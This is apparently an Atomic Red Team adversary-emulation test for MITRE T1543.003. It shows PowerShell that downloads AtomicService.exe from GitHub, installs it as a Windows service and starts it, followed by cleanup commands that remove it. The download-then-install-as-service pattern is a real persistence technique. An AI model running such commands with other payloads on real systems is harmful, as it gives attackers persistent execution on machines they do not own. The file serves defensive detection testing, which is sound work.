#TechniqueName: Create or Modify System Process: Windows Service
#AtomicTestName: Service Installation PowerShell
#Description: Installs A Local Service via PowerShell.&Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.&
#Language: ps1

#get_prereq_commands
New-Item -Type Directory (split-path PathToAtomicsFolder\T1543.003\bin\AtomicService.exe) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe"


#commands
New-Service -Name "AtomicTestService_PowerShell" -BinaryPathName "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe"
Start-Service -Name "AtomicTestService_PowerShell"


#cleanup_commands
Stop-Service -Name "AtomicTestService_PowerShell" 2>&1 | Out-Null
try {(Get-WmiObject Win32_Service -filter "name='AtomicTestService_PowerShell'").Delete()}
catch {}

